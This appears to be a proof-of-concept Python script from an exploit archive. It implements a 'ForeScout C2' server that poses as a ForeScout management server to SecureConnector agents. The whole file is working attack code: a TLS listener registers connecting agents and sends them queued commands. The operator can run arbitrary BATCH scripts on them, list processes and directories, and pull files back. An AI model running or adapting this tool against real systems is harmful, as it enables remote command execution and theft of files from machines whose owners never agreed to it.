4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / forescout_c2.py PY
import datetime
import asyncio
import ssl
import xml.etree.ElementTree as ET
import io
import base64
import queue
import socket

from prompt_toolkit.shortcuts import PromptSession
from prompt_toolkit.history import FileHistory
from prompt_toolkit.patch_stdout import patch_stdout
from prompt_toolkit.completion import PathCompleter
from prompt_toolkit.completion import NestedCompleter
from prompt_toolkit.completion import WordCompleter
from prompt_toolkit.completion import Completer
from prompt_toolkit.completion import Completion
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from prompt_toolkit.styles import Style
from prompt_toolkit.formatted_text import HTML
from prompt_toolkit import print_formatted_text as print

from functools import reduce

# Registry of agents that have sent an FSAGENT_INIT message, keyed by the
# message's "mac_address" attribute. Each value is a dict holding the agent's
# identity fields, a queue of pending commands and a running command counter.
agents = dict()
# Key into `agents` selected by the operator with the `use` command, or None.
current_id = None
# Set to True by the `quit` command; polled by every client handler loop.
# NOTE: this name shadows the `quit` builtin inside this module.
quit = False
# Completer offering known agent ids; created lazily by update_agents().
agent_completer : WordCompleter = None
# Assigned by run_server(); closed by the `quit` command.
server : asyncio.Server

def generate_cmd(cmd):
    """Frame a text payload for transmission to an agent.

    The result is ``NNNN:`` (the payload length as a zero-padded decimal of at
    least four digits), followed by the UTF-8 encoded payload, followed by a
    zero-length frame header ``0000:``.

    The length is the number of *encoded bytes*, because the receiving side
    of this framing reads exactly that many bytes; counting characters would
    under-report any payload containing non-ASCII text.

    Args:
        cmd: The payload text (an XML document in this file).

    Returns:
        A ``bytearray`` holding the framed message.
    """
    payload = cmd.encode('utf8')
    header = '{:0>4}:'.format(len(payload)).encode('ascii')
    return bytearray(header + payload + b'0000:')

def generate_processes(id: int):
    """Return the framed FSAGENT_REQ that asks for the process list.

    Args:
        id: Value written into the COMMAND element's ``id`` attribute.
    """
    template = (
        '<FSAGENT_REQ><COMMANDS><COMMAND id="%d">'
        '<PROCESSES/>'
        '</COMMAND></COMMANDS></FSAGENT_REQ>'
    )
    return generate_cmd(template % id)


def generate_files_in_dir(dir: str, id: int):
    """Return the framed FSAGENT_REQ that asks for a directory listing.

    Args:
        dir: Path (or pattern) placed inside the FULL_PATH element.
        id: Value written into the COMMAND element's ``id`` attribute.
    """
    # NOTE(review): `dir` is interpolated verbatim; characters such as '&' or
    # '<' are not XML-escaped. Confirm what the receiving parser expects
    # before changing this.
    template = (
        '<FSAGENT_REQ><COMMANDS><COMMAND id="%d">'
        '<FILES_IN_DIR><FULL_PATH>%s</FULL_PATH></FILES_IN_DIR>'
        '</COMMAND></COMMANDS></FSAGENT_REQ>'
    )
    return generate_cmd(template % (id, dir))

def generate_exec(command: str, id: int):
    """Return the framed FSAGENT_REQ carrying a SCRIPT element.

    The script is declared with ``language="BATCH"``, ``max_time="10000"`` and
    ``wait="1"``; its body is wrapped in a CDATA section.

    Args:
        command: Text placed inside the CDATA body.
        id: Value written into the COMMAND element's ``id`` attribute.
    """
    template = (
        '<FSAGENT_REQ><COMMANDS><COMMAND id="%d">'
        '<SCRIPT max_time="10000" wait="1" language="BATCH">'
        '<BODY><![CDATA[%s]]></BODY>'
        '<COMMAND_LINE>  </COMMAND_LINE>'
        '</SCRIPT></COMMAND></COMMANDS></FSAGENT_REQ>'
    )
    return generate_cmd(template % (id, command))

def generate_get_file(file: str, id: int):
    """Return the framed FSAGENT_REQ carrying a GET_FILE element.

    Leading whitespace is stripped from the path before it is embedded.

    Args:
        file: Path placed inside the PATH element.
        id: Value written into the COMMAND element's ``id`` attribute.
    """
    template = (
        '<FSAGENT_REQ><COMMANDS><COMMAND id="%d">'
        '<GET_FILE type="BINARY"><PATH>%s</PATH></GET_FILE>'
        '</COMMAND></COMMANDS></FSAGENT_REQ>'
    )
    path = file.lstrip()
    return generate_cmd(template % (id, path))

def parse_message(raw_msg):
    """Decode one received XML message into a plain dict.

    The returned dict always has a ``'type'`` key, initially the root tag.

    * ``FSAGENT_INIT``: adds ``'id'`` (the ``mac_address`` attribute),
      ``'user'``, ``'domain'``, ``'host'`` (base64-decoded attributes) and
      ``'admin'``.
    * ``FSAGENT_RESP`` with a direct ``COMMAND`` child: ``'type'`` becomes
      ``'command'`` and, depending on the first recognised child of
      ``COMMAND``, the dict gains:

      - ``FILES_IN_DIR`` -> ``'command': 'dir'`` and ``'files'`` (list of the
        text of every ``FILE`` child);
      - ``SCRIPT`` -> ``'command': 'shell'`` and ``'output'`` (text of the
        ``OUTPUT`` child, or ``''`` when it is absent or empty);
      - ``GET_FILE`` with a ``BODY`` -> ``'command': 'getfile'`` and
        ``'content'`` (``bytearray`` decoded from the hex text);
      - ``PROCESSES`` -> ``'command': 'ps'`` and ``'processes'`` (the
        ``name`` attribute of every descendant ``PROCESS``).

      When no recognised child is found, no ``'command'`` key is set.

    Args:
        raw_msg: UTF-8 encoded XML document as bytes.

    Returns:
        The dict described above.

    Raises:
        xml.etree.ElementTree.ParseError: if the document is not well-formed.
        KeyError: if an expected attribute is missing.
    """
    root = ET.fromstring(str(raw_msg, 'utf8'))
    message = {'type': root.tag}

    if root.tag == 'FSAGENT_INIT':
        message['id'] = root.attrib['mac_address']
        # [0:-1] drops the final decoded byte — presumably a trailing NUL
        # terminator sent by the agent; TODO confirm.
        for key, attr in (('user', 'user'), ('domain', 'domain'), ('host', 'hostname')):
            message[key] = str(base64.b64decode(root.attrib[attr])[0:-1], 'utf8')
        message['admin'] = root.attrib['admin']
    elif root.tag == 'FSAGENT_RESP':
        if (command := root.find('COMMAND')) is not None:
            message['type'] = 'command'
            if (dir_list := command.find('FILES_IN_DIR')) is not None:
                message['command'] = 'dir'
                message['files'] = [entry.text for entry in dir_list.findall('FILE')]
            elif (script := command.find('SCRIPT')) is not None:
                message['command'] = 'shell'
                # Compare against None explicitly: an Element without child
                # elements is falsy, so a bare truth test would discard an
                # OUTPUT element that only contains text.
                output = script.find('OUTPUT')
                message['output'] = (output.text or '') if output is not None else ''
            elif (getfile := command.find('GET_FILE')) is not None:
                if (filebody := getfile.find('BODY')) is not None:
                    data = bytearray.fromhex(filebody.text)
                    message['command'] = 'getfile'
                    message['content'] = data
            elif (processes := command.find('PROCESSES')) is not None:
                message['command'] = 'ps'
                message['processes'] = [
                    process.attrib['name'] for process in processes.findall('.//PROCESS')
                ]

    return message

def update_agents():
    """Refresh the agent-id completer from the current `agents` registry.

    Each agent id is offered as a completion word, annotated with
    ``user@host``. The completer is created on first use and afterwards
    updated in place, so objects already holding a reference to it see the
    new entries.
    """
    global agent_completer

    known = list(agents.values())
    agent_ids = [entry['id'] for entry in known]
    agent_meta = {
        entry['id']: "%s@%s" % (entry['user'], entry['host']) for entry in known
    }

    if agent_completer is not None:
        agent_completer.words = agent_ids
        agent_completer.meta_dict = agent_meta
        return

    agent_completer = WordCompleter(agent_ids, meta_dict=agent_meta, ignore_case=True)

def execute_agent_command(command, args, current_id):
    """Queue ``(command, args)`` for the agent registered under `current_id`.

    Nothing happens when `current_id` is not a key of the `agents` registry.
    """
    if current_id not in agents:
        return

    pending = agents[current_id]['commands']
    pending.put((command, args))


def _print_command_result(message):
    """Print the payload of a parsed 'command' response, if it has one."""
    kind = message.get('command')  # absent when the response had no known payload
    if kind == 'dir':
        for file in message['files']:
            print(file)
    elif kind == 'shell':
        print('Command executed')
        print(message['output'])
    elif kind == 'ps':
        for process in message['processes']:
            print(process)
    # 'getfile' responses are parsed but their content is not used here.


def _build_request(command, command_id):
    """Turn a queued ``(name, args)`` tuple into a framed request, or None."""
    name, args = command
    if name == 'dir':
        return generate_files_in_dir(args[0] if args else 'c:\\*', command_id)
    if name == 'shell':
        # Every argument is prefixed with a single space, as before.
        return generate_exec(''.join(' ' + part for part in args), command_id)
    if name == 'get':
        return generate_get_file(''.join(' ' + part for part in args), command_id)
    if name == 'ps':
        return generate_processes(command_id)
    return None


async def handle_client(reader, writer):
    """Serve one connection until it closes or the global `quit` flag is set.

    Each iteration waits up to one second for a frame header (four ASCII
    digits plus one separator byte), reads that many payload bytes, and
    processes the parsed message:

    * ``FSAGENT_INIT`` registers the sender in `agents` (if new), binds this
      connection to that id and replies with an FSAGENT_CNFG message.
    * ``command`` responses are printed.

    After that, at most one queued command for the bound agent is sent.

    Args:
        reader: ``asyncio.StreamReader`` for the connection.
        writer: ``asyncio.StreamWriter`` for the connection; closed on exit.
    """
    client_id = None

    try:
        while not quit:
            try:
                size_str = await asyncio.wait_for(reader.readexactly(5), 1)
                size = int(str(size_str[0:4], 'ascii'))
                message_data = await reader.readexactly(size)
            except asyncio.TimeoutError:
                # Nothing arrived within the poll interval; fall through so
                # queued commands still get a chance to be sent.
                message_data = b''
            except asyncio.IncompleteReadError:
                # readexactly() signals EOF by raising, never by returning
                # an empty result: the peer closed the connection.
                break

            if message_data:
                message = parse_message(message_data)

                if message['type'] == 'FSAGENT_INIT':
                    if message['id'] not in agents:
                        agents[message['id']] = {'id': message['id'], 'commands': queue.Queue(),  'host': message['host'], 'user': message['user'], 'domain': message['domain'], 'admin': message['admin'], 'command_id':0}
                        update_agents()
                        print("Agent {} ({}@{}) connected".format(message['id'], message['user'], message['host']))
                    client_id = message['id']
                    writer.write(generate_cmd('<FSAGENT_CNFG POLLING_TIME="10"></FSAGENT_CNFG>'))
                    await writer.drain()
                elif message['type'] == 'command':
                    _print_command_result(message)

            if client_id is not None and not agents[client_id]['commands'].empty():
                agent = agents[client_id]
                command = agent['commands'].get()
                agent['command_id'] += 1
                request = _build_request(command, agent['command_id'])
                if request is not None:
                    writer.write(request)
                    await writer.drain()

    except socket.error:
        # Connection-level failures (reset, broken pipe) simply end the session.
        pass

    except Exception as e:
        print("Error on agent thread: ", e)

    finally:
        # Release the transport regardless of how the loop ended.
        writer.close()
                
    
async def run_server():
    """Start the TLS listener on 0.0.0.0:10003 and publish it as `server`.

    The certificate chain is loaded from ``server.pem`` / ``key.pem`` in the
    working directory. Client certificates are not requested. The coroutine
    returns as soon as the listener is accepting connections; connections are
    then handled by `handle_client`.

    Raises:
        OSError: if the certificate files cannot be read or the port cannot
            be bound.
        ssl.SSLError: if the certificate or cipher configuration is rejected.
    """
    global server

    context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    context.verify_mode = ssl.CERT_NONE
    context.load_cert_chain(keyfile='key.pem', certfile='server.pem')
    # NOTE(review): the list includes legacy suites (e.g. DES-CBC3-SHA),
    # presumably for compatibility with the connecting client — confirm
    # before trimming.
    context.set_ciphers('ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-CHACHA20-POLY1305:ECDHE-RSA-CHACHA20-POLY1305:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-CHACHA20-POLY1305:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA:ECDHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA256:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:DES-CBC3-SHA')

    addr = ('0.0.0.0', 10003)
    # Bind the awaited result: start_server() is a coroutine, and only the
    # Server object it yields has a close() that stops the listener.
    server = await asyncio.start_server(handle_client, *addr, ssl=context)

def get_toolbar():
    """Build the bottom-toolbar text: current time plus the selected agent.

    The agent part is ``user@host: `` when `current_id` names a registered
    agent, otherwise empty.

    Returns:
        A prompt_toolkit ``HTML`` formatted-text object.
    """
    agent_info = ''

    if current_id is not None and current_id in agents:
        agent = agents[current_id]
        agent_info = "%s@%s: " % (agent['user'], agent['host'])

    # Interpolate through HTML's own % operator so the values are escaped:
    # user/host come from the remote side and may contain '<' or '&', which
    # would otherwise make the markup unparsable.
    return HTML("<span>%s</span>       <span>%s</span>") % (datetime.datetime.now().ctime(), agent_info)


async def interactive_shell():
    """Run the operator prompt until `quit` (or end-of-input) is entered.

    Recognised input:

    * ``use <id>`` selects the agent that later commands are queued for.
    * ``quit`` sets the global `quit` flag, closes `server` and returns.
    * Any other non-empty command is queued for the selected agent via
      `execute_agent_command`; it is ignored when no agent is selected.
    """
    global current_id, quit

    # Make sure agent_completer exists before it is wired into the nested
    # completer below.
    update_agents()

    commands_completer = NestedCompleter.from_nested_dict(
        {
            "use": agent_completer,
            "init": None,
            "dir": None,
            "shell": None,
            "get": None,
            "ps": None,
            "quit": None,
        }
    )

    suggester = AutoSuggestFromHistory()
    our_history = FileHistory("history.txt")
    session = PromptSession("ForeScout C2> ", history=our_history, completer=commands_completer, complete_while_typing=True, auto_suggest=suggester)

    style = Style.from_dict(
        {
            "bottom-toolbar": "#ffffff bg:#000000",
            "bottom-toolbar.text": "#ffffff bg:#000000",
        }
    )

    current_prompt = 'ForeScout C2> '

    while True:
        try:
            line = await session.prompt_async(current_prompt, bottom_toolbar=get_toolbar, refresh_interval=0.5, style=style)
        except EOFError:
            # End-of-input (Ctrl-D) takes the same clean shutdown path as `quit`.
            line = 'quit'

        args = line.split(' ')
        command = args[0]
        args = args[1:]

        if command == 'use':
            # Guard against a bare `use`, which previously raised IndexError
            # and terminated the shell.
            if not args or not args[0]:
                print("Usage: use <agent id>")
                continue
            current_id = args[0]
        elif command == 'quit':
            quit = True
            server.close()
            return
        else:
            if current_id is not None and command != '':
                execute_agent_command(command, args, current_id)


async def main():
    """Run the operator shell and the listener concurrently.

    Output is routed through ``patch_stdout`` while both run. Any
    ``Exception`` raised by either coroutine is printed rather than
    propagated.
    """
    try:
        with patch_stdout():
            jobs = (interactive_shell(), run_server())
            await asyncio.gather(*jobs)
            print("Quitting event loop. Bye.")
    except Exception as err:
        print(err)



if __name__ == "__main__":
    # asyncio.run() is available on every interpreter able to parse this file
    # (the module uses assignment expressions), so no fallback is needed. The
    # previous fallback called asyncio.run_until_complete, which does not exist.
    asyncio.run(main())